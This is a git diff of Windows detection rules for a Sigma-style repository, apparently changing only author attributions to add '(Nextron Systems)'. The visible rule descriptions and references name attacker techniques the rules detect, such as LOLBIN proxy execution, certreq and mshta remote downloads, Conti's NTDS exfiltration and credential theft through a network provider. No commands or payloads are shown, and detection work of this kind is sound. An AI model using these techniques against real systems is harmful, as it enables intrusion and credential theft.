https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml b/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml index a6b99319e..01a477d22 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml @@ -4,7 +4,7 @@ status: experimental description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting references: - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/01 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml b/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml index da01b4d34..e39089e6b 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag references: - https://github.com/LOLBAS-Project/LOLBAS/pull/264 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/10 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml b/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml index fa924f846..1561da279 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name references: - https://twitter.com/0gtweet/status/1560732860935729152 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/22 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml b/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml index 92e76a9dd..9ee5ec13b 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml @@ -5,7 +5,7 @@ description: Detects the execution of sigverif binary as a parent process which references: - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/ - https://twitter.com/0gtweet/status/1457676633809330184 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml b/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml index 1bffb4176..411f86556 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml @@ -7,7 +7,7 @@ status: experimental description: The "Squirrel.exe" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml b/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml index 2b4fc992b..83513b37d 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml @@ -6,7 +6,7 @@ references: - https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 - https://twitter.com/bohops/status/1477717351017680899?s=12 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/06 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml index 1d262ba20..42d1a532d 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files references: - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/11/24 modified: 2022/06/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml b/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml index 278ff0246..449026a83 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml @@ -5,7 +5,7 @@ description: Detects execution of of Dxcap.exe references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/ - https://twitter.com/harr0ey/status/992008180904419328 -author: Beyu Denis, oscd.community, Nasreddine Bencherchali (update) +author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/26 modified: 2022/06/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml b/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml index 38893566b..a35b46a0d 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors references: - https://twitter.com/0gtweet/status/1526833181831200770 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/19 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_type.yml b/rules/windows/process_creation/proc_creation_win_lolbin_type.yml index f52f1e88b..4062e2954 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_type.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_type.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the "type" command to download/upload data from WebDAV server references: - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/14 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml b/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml index 0646b0d2f..9e011e003 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml @@ -4,7 +4,7 @@ status: experimental description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml b/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml index fad930406..277b6c06f 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml @@ -10,7 +10,7 @@ description: | references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ - https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py -author: Nasreddine Bencherchali, Victor Sergeev, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community date: 2022/05/17 modified: 2022/07/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml b/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml index 49b1b3211..2630c727d 100644 --- a/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml +++ b/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml @@ -7,7 +7,7 @@ references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/07 modified: 2022/10/26 tags: diff --git a/rules/windows/process_creation/proc_creation_win_mal_adwind.yml b/rules/windows/process_creation/proc_creation_win_mal_adwind.yml index 37f7153ae..287e19af4 100644 --- a/rules/windows/process_creation/proc_creation_win_mal_adwind.yml +++ b/rules/windows/process_creation/proc_creation_win_mal_adwind.yml @@ -5,7 +5,7 @@ description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf -author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community date: 2017/11/10 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml b/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml index b7f534fec..4aded8c27 100644 --- a/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml +++ b/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml @@ -6,7 +6,7 @@ references: - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html - https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/ - https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/14 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml b/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml index 1d8e4dd7c..136ed2dce 100644 --- a/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml +++ b/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/25 modified: 2022/09/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml b/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml index 13847df3e..994886b9c 100644 --- a/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml +++ b/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml @@ -23,7 +23,7 @@ references: - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ - https://github.com/besimorhino/powercat -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/02 modified: 2023/01/23 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_conti.yml b/rules/windows/process_creation/proc_creation_win_malware_conti.yml index 54ff61a46..b9c3502f7 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_conti.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_conti.yml @@ -5,7 +5,7 @@ description: Detects a command used by conti to find volume shadow backups references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection -author: Max Altgelt, Tobias Michalski +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) date: 2021/08/09 tags: - attack.t1587.001 diff --git a/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml b/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml index d8352babb..cf2dca9d4 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml @@ -5,7 +5,7 @@ description: Detects a command used by conti to exfiltrate NTDS references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection -author: Max Altgelt, Tobias Michalski +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) date: 2021/08/09 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml index 616029c65..54ba2bb46 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection - https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ -author: Max Altgelt, Tobias Michalski +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) date: 2021/08/09 modified: 2022/09/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_dridex.yml b/rules/windows/process_creation/proc_creation_win_malware_dridex.yml index 7ecb3c6b9..33bd55e74 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_dridex.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_dridex.yml @@ -4,7 +4,7 @@ status: stable description: Detects typical Dridex process patterns references: - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3 -author: Florian Roth, oscd.community +author: Florian Roth (Nextron Systems), oscd.community date: 2019/01/10 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml b/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml index 21c793a33..3755f913d 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml @@ -6,7 +6,7 @@ references: - https://securelist.com/my-name-is-dtrack/93338/ - https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/ - https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/30 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml index 45a4cb502..cd0922db3 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml @@ -7,7 +7,7 @@ references: - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/ - https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/ - https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/09/30 modified: 2022/09/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_formbook.yml b/rules/windows/process_creation/proc_creation_win_malware_formbook.yml index aeaf469c9..01f1a30ac 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_formbook.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_formbook.yml @@ -7,7 +7,7 @@ references: - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/ - https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/ - https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/ -author: Florian Roth, oscd.community, Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2019/09/30 modified: 2022/10/06 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml b/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml index e1724f884..90595d9ab 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml @@ -5,7 +5,7 @@ description: Detects NotPetya ransomware activity in which the extracted passwor references: - https://securelist.com/schroedingers-petya/78870/ - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 -author: Florian Roth, Tom Ueltschi +author: Florian Roth (Nextron Systems), Tom Ueltschi date: 2019/01/16 modified: 2022/12/15 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_qbot.yml b/rules/windows/process_creation/proc_creation_win_malware_qbot.yml index 46dfb7913..548c6abfa 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_qbot.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_qbot.yml @@ -5,7 +5,7 @@ description: Detects QBot like process executions references: - https://twitter.com/killamjr/status/1179034907932315648 - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/01 modified: 2022/08/24 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml b/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml index 049a1f324..d08f27021 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml @@ -4,7 +4,7 @@ status: stable description: Detects Ryuk ransomware activity references: - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/12/16 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml b/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml index 0882dad3b..354cc6c76 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml @@ -2,7 +2,7 @@ title: WScript or CScript Dropper id: cea72823-df4d-4567-950c-0b579eaf0846 status: test description: Detects wscript/cscript executions of scripts located in user directories -author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community +author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community date: 2019/01/16 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml b/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml index a5ea151e0..b6fee5fdb 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml @@ -5,7 +5,7 @@ description: Detects Trickbot malware process tree pattern in which rundll32.exe references: - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/11/26 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml b/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml index c9b230d3a..0d0b4dd09 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml @@ -4,7 +4,7 @@ status: test description: Detects WannaCry ransomware activity references: - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 -author: Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro date: 2019/01/16 modified: 2022/02/24 tags: diff --git a/rules/windows/process_creation/proc_creation_win_msdt.yml b/rules/windows/process_creation/proc_creation_win_msdt.yml index f7891da47..cd7e06376 100644 --- a/rules/windows/process_creation/proc_creation_win_msdt.yml +++ b/rules/windows/process_creation/proc_creation_win_msdt.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ - https://twitter.com/_JohnHammond/status/1531672601067675648 -author: Nasreddine Bencherchali (rule) +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/05/29 modified: 2023/01/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml b/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml index 83e577291..98398220f 100644 --- a/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml +++ b/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 references: - https://twitter.com/nas_bench/status/1537896324837781506 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/21 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml b/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml index 550c1dbee..bca252623 100644 --- a/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml +++ b/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml @@ -4,7 +4,7 @@ status: test description: Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet references: - https://twitter.com/mrd0x/status/1478234484881436672?s=12 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/11 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_msexchange_transport_agent.yml b/rules/windows/process_creation/proc_creation_win_msexchange_transport_agent.yml index 6d2353f98..05cf509a3 100644 --- a/rules/windows/process_creation/proc_creation_win_msexchange_transport_agent.yml +++ b/rules/windows/process_creation/proc_creation_win_msexchange_transport_agent.yml @@ -7,7 +7,7 @@ status: test description: Detects the Installation of a Exchange Transport Agent references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7 -author: Tobias Michalski +author: Tobias Michalski (Nextron Systems) date: 2021/06/08 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_mshta_http.yml b/rules/windows/process_creation/proc_creation_win_mshta_http.yml index fe89e91a1..9630ed124 100644 --- a/rules/windows/process_creation/proc_creation_win_mshta_http.yml +++ b/rules/windows/process_creation/proc_creation_win_mshta_http.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/08 modified: 2022/08/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml b/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml index d78acc24a..602ceb643 100644 --- a/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml +++ b/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml @@ -5,7 +5,7 @@ related: type: similar status: experimental description: Detects usage of Msiexec.exe to install packages hosted remotely quietly -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/28 references: - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ diff --git a/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml b/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml index 2878c31cc..602a9ec13 100644 --- a/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml +++ b/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml @@ -6,7 +6,7 @@ references: - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/01 modified: 2022/09/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_net_recon.yml b/rules/windows/process_creation/proc_creation_win_net_recon.yml index a5edaf179..8b621f644 100644 --- a/rules/windows/process_creation/proc_creation_win_net_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_net_recon.yml @@ -6,7 +6,7 @@ references: - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ -author: Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali date: 2019/01/16 modified: 2022/09/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml b/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml index eb9804982..0d88a2031 100644 --- a/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml +++ b/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml @@ -7,7 +7,7 @@ status: test description: Detects creation of local users via the net.exe command with the option "never expire" references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/12 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml b/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml index 8d0415a03..a0c717778 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml @@ -6,7 +6,7 @@ references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - https://adepts.of0x.cc/netsh-portproxy-code/ - https://www.dfirnotes.net/portproxy_detection/ -author: Florian Roth, omkar72, oscd.community +author: Florian Roth (Nextron Systems), omkar72, oscd.community date: 2019/01/29 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml b/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml index 7bce65719..b969f4291 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml @@ -4,7 +4,7 @@ status: test description: Detects netsh commands that configure a port forwarding of port 3389 used for RDP references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html -author: Florian Roth, oscd.community +author: Florian Roth (Nextron Systems), oscd.community date: 2019/01/29 modified: 2022/11/14 tags: diff --git a/rules/windows/process_creation/proc_creation_win_new_network_provider.yml b/rules/windows/process_creation/proc_creation_win_new_network_provider.yml index 0a3f5919a..a01b0e22e 100644 --- a/rules/windows/process_creation/proc_creation_win_new_network_provider.yml +++ b/rules/windows/process_creation/proc_creation_win_new_network_provider.yml @@ -8,7 +8,7 @@ description: Detects when an attacker tries to add a new network provider in ord references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/23 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_node_abuse.yml b/rules/windows/process_creation/proc_creation_win_node_abuse.yml index 9f3f670c7..7602c5a3f 100644 --- a/rules/windows/process_creation/proc_creation_win_node_abuse.yml +++ b/rules/windows/process_creation/proc_creation_win_node_abuse.yml @@ -7,7 +7,7 @@ references: - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return - https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/ - https://nodejs.org/api/cli.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_nps.yml b/rules/windows/process_creation/proc_creation_win_nps.yml index 1f517b76e..44daef5c5 100644 --- a/rules/windows/process_creation/proc_creation_win_nps.yml +++ b/rules/windows/process_creation/proc_creation_win_nps.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of NPS a port forwarding tool references: - https://github.com/ehang-io/nps -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/10/08 tags: - attack.command_and_control diff --git 